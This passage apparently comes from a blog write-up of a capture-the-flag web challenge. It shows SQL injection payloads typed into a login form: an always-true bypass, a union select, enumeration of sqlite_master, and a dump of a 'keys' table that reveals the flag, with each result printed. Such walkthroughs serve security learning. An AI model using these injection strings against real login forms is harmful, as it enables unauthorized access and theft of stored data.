Password  :

And that is the result in the website:



logged in as root



Well, it works but right here is not the flag. I was focused on Tamper Data and this query at response headers :

X-Sql=select name from users where name = '' or '1'='1' and password = '' or '1'='1' limit 1;


So,   here we go but nothing goes right, then we gotta guess further information, eg. the  union, database engine.

Username :  ‘ union select 666– –

Password  :



logged in as 666



Great!  We notice of injection point. And we can watch the output in the web browser. I tried quite with information_schema for MySQL, all_tables for Oracle and so on……  But you didn’t obtain anything on the screen. But if we try with this SQLite payload……

Username :  ‘ union  SELECT name FROM sqlite_master– –

Password  :



logged in as keys



And now everything is over with :

Username :   ‘ union select *  from keys– –

Password  :



logged in as The key is: literally online lolling on line WucGesJi



Related Posts Plugin for WordPress, Blogger...
Categories: SQLinjection Tags: